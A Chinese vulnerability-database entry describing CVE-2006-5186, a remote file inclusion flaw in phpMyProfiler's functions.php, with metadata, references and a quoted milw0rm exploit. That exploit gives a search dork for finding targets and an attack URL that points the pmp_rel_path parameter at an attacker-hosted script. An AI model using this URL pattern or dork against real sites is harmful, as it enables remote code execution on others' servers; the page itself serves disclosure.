PHPMyProfiler 'functions.php'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111186 漏洞类型 输入验证
发布时间 2006-10-03 更新时间 2006-10-23
CVE编号 CVE-2006-5186 CNNVD-ID CNNVD-200610-093
漏洞平台 PHP CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/2470
https://cxsecurity.com/issue/WLB-2006100062
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-093
|漏洞详情
phpMyProfiler0.9.6及更早版本的functions.php中存在PHP远程文件包含漏洞,在启用register_globals时,远程攻击者可以通过pmp_rel_path参数中的URL执行任意PHP代码。
|漏洞EXP
# Author: mozi2weed@yahoo.com mozi
# phpMyProfiler Remote File Inclusion Vulnerability
# Greetz: Raver #phpfreaks eu.undernet.org
------------------------------------------------------------------
Download: http://sourceforge.net/projects/phpmyprofiler
------------------------------------------------------------------
require_once($pmp_rel_path . '/include/PEAR/HTTP.php');
_________________________________________________________________
googledork:phpMyProfiler

http://site.com/[path]/functions.php?pmp_rel_path=http://[Evil_scr
ipt]
PS:Whitehat aia de pe undernet sug pula!!!  Lameri boratzi
#phpfreaks rulz
# heh tnx

# milw0rm.com [2006-10-03]
|参考资料

来源:XF
名称:phpmyprofiler-functions-file-include(29335)
链接:http://xforce.iss.net/xforce/xfdb/29335
来源:www.phpmyprofiler.de
链接:http://www.phpmyprofiler.de/index.php?page=2
来源:VUPEN
名称:ADV-2006-3896
链接:http://www.frsirt.com/english/advisories/2006/3896
来源:SECTRACK
名称:1016980
链接:http://securitytracker.com/id?1016980
来源:SECUNIA
名称:22144
链接:http://secunia.com/advisories/22144
来源:forum.phpmyprofiler.de
链接:http://forum.phpmyprofiler.de/viewtopic.php?p=2745#2745
来源:BID
名称:20324
链接:http://www.securityfocus.com/bid/20324
来源:BUGTRAQ
名称:20061003phpMyProfilerremotefileinclude
链接:http://www.securityfocus.com/archive/1/archive/1/447646/100/0/threaded
来源:MILW0RM
名称:2470
链接:http://www.milw0rm.com/exploits/2470
来源:SREASON
名称:1696
链接:http://securityreason.com/securityalert/1696
来源:MILW0RM
名称:2470
链接:http://milw0rm.com/exploits/2470